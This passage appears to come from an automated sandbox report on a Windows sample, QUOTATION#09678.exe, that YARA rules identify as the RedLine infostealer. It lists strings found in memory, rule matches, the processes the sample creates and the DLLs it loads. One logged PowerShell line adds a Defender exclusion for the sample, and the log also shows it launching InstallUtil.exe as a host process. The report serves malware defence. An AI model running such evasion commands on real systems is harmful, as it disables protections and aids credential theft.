                    Source: tmp819F.tmp.5.dr, tmp49EE.tmp.5.dr, tmp4A0F.tmp.5.dr, tmp49FE.tmp.5.dr, tmp814F.tmp.5.dr, tmpB88F.tmp.5.dr, tmpB87F.tmp.5.dr, tmp817E.tmp.5.dr, tmp4A40.tmp.5.dr, tmp4A20.tmp.5.dr, tmpB8AF.tmp.5.dr, tmpB8B0.tmp.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: tmp819F.tmp.5.dr, tmp49EE.tmp.5.dr, tmp4A0F.tmp.5.dr, tmp49FE.tmp.5.dr, tmp814F.tmp.5.dr, tmpB88F.tmp.5.dr, tmpB87F.tmp.5.dr, tmp817E.tmp.5.dr, tmp4A40.tmp.5.dr, tmp4A20.tmp.5.dr, tmpB8AF.tmp.5.dr, tmpB8B0.tmp.5.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: tmp819F.tmp.5.dr, tmp49EE.tmp.5.dr, tmp4A0F.tmp.5.dr, tmp49FE.tmp.5.dr, tmp814F.tmp.5.dr, tmpB88F.tmp.5.dr, tmpB87F.tmp.5.dr, tmp817E.tmp.5.dr, tmp4A40.tmp.5.dr, tmp4A20.tmp.5.dr, tmpB8AF.tmp.5.dr, tmpB8B0.tmp.5.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: tmp819F.tmp.5.dr, tmp49EE.tmp.5.dr, tmp4A0F.tmp.5.dr, tmp49FE.tmp.5.dr, tmp814F.tmp.5.dr, tmpB88F.tmp.5.dr, tmpB87F.tmp.5.dr, tmp817E.tmp.5.dr, tmp4A40.tmp.5.dr, tmp4A20.tmp.5.dr, tmpB8AF.tmp.5.dr, tmpB8B0.tmp.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: tmp819F.tmp.5.dr, tmp49EE.tmp.5.dr, tmp4A0F.tmp.5.dr, tmp49FE.tmp.5.dr, tmp814F.tmp.5.dr, tmpB88F.tmp.5.dr, tmpB87F.tmp.5.dr, tmp817E.tmp.5.dr, tmp4A40.tmp.5.dr, tmp4A20.tmp.5.dr, tmpB8AF.tmp.5.dr, tmpB8B0.tmp.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: tmp819F.tmp.5.dr, tmp49EE.tmp.5.dr, tmp4A0F.tmp.5.dr, tmp49FE.tmp.5.dr, tmp814F.tmp.5.dr, tmpB88F.tmp.5.dr, tmpB87F.tmp.5.dr, tmp817E.tmp.5.dr, tmp4A40.tmp.5.dr, tmp4A20.tmp.5.dr, tmpB8AF.tmp.5.dr, tmpB8B0.tmp.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2385941630.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: tmp819F.tmp.5.dr, tmp49EE.tmp.5.dr, tmp4A0F.tmp.5.dr, tmp49FE.tmp.5.dr, tmp814F.tmp.5.dr, tmpB88F.tmp.5.dr, tmpB87F.tmp.5.dr, tmp817E.tmp.5.dr, tmp4A40.tmp.5.dr, tmp4A20.tmp.5.dr, tmpB8AF.tmp.5.dr, tmpB8B0.tmp.5.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: tmp819F.tmp.5.dr, tmp49EE.tmp.5.dr, tmp4A0F.tmp.5.dr, tmp49FE.tmp.5.dr, tmp814F.tmp.5.dr, tmpB88F.tmp.5.dr, tmpB87F.tmp.5.dr, tmp817E.tmp.5.dr, tmp4A40.tmp.5.dr, tmp4A20.tmp.5.dr, tmpB8AF.tmp.5.dr, tmpB8B0.tmp.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.QUOTATION#09678.exe.2cc91c398f8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.QUOTATION#09678.exe.2cc91c398f8.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.QUOTATION#09678.exe.2cc91c51740.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.QUOTATION#09678.exe.2cc91c51740.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.QUOTATION#09678.exe.2cc91c51740.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.QUOTATION#09678.exe.2cc91c51740.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.QUOTATION#09678.exe.2cc91c398f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.QUOTATION#09678.exe.2cc91c398f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000005.00000002.2385941630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: QUOTATION#09678.exe PID: 764, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: InstallUtil.exe PID: 5652, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: QUOTATION#09678.exe
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FF848E5BEC40_2_00007FF848E5BEC4
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FF848E5F6990_2_00007FF848E5F699
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FF848E59A500_2_00007FF848E59A50
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FF848E52FF00_2_00007FF848E52FF0
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FF848E5C7300_2_00007FF848E5C730
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FF848E54F000_2_00007FF848E54F00
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FF848E550AC0_2_00007FF848E550AC
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FF848E59C080_2_00007FF848E59C08
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FF848E511F20_2_00007FF848E511F2
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FF848E6BEA00_2_00007FF848E6BEA0
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FF848F200610_2_00007FF848F20061
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0160E7B05_2_0160E7B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0160DC905_2_0160DC90
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 764 -s 1056
                    Source: QUOTATION#09678.exeStatic PE information: No import functions for PE file found
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs QUOTATION#09678.exe
                    Source: QUOTATION#09678.exe, 00000000.00000000.2010415796.000002CCFEA16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFuckingShit.exe8 vs QUOTATION#09678.exe
                    Source: QUOTATION#09678.exe, 00000000.00000002.2270306101.000002CCFF140000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameIcotuxomihehuxovekenD vs QUOTATION#09678.exe
                    Source: QUOTATION#09678.exeBinary or memory string: OriginalFilenameFuckingShit.exe8 vs QUOTATION#09678.exe
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.QUOTATION#09678.exe.2cc91c398f8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.QUOTATION#09678.exe.2cc91c398f8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.QUOTATION#09678.exe.2cc91c51740.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.QUOTATION#09678.exe.2cc91c51740.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.QUOTATION#09678.exe.2cc91c51740.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.QUOTATION#09678.exe.2cc91c51740.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.QUOTATION#09678.exe.2cc91c398f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.QUOTATION#09678.exe.2cc91c398f8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000005.00000002.2385941630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: QUOTATION#09678.exe PID: 764, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: InstallUtil.exe PID: 5652, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: QUOTATION#09678.exe, -------.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@12/55@1/1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1520:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6656:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess764
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cl0uf5e1.v3l.ps1Jump to behavior
                    Source: QUOTATION#09678.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: QUOTATION#09678.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: InstallUtil.exe, 00000005.00000002.2386917577.00000000033AF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2386917577.000000000349C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2386917577.0000000003427000.00000004.00000800.00020000.00000000.sdmp, tmp1261.tmp.5.dr, tmpEEF8.tmp.5.dr, tmpB8D1.tmp.5.dr, tmpEEF9.tmp.5.dr, tmpB8D2.tmp.5.dr, tmp121E.tmp.5.dr, tmpEEE7.tmp.5.dr, tmp1240.tmp.5.dr, tmpEEE6.tmp.5.dr, tmp1262.tmp.5.dr, tmp1241.tmp.5.dr, tmp121F.tmp.5.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: QUOTATION#09678.exeVirustotal: Detection: 31%
                    Source: QUOTATION#09678.exeReversingLabs: Detection: 28%
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeFile read: C:\Users\user\Desktop\QUOTATION#09678.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION#09678.exe "C:\Users\user\Desktop\QUOTATION#09678.exe"
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 764 -s 1056
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -ForceJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
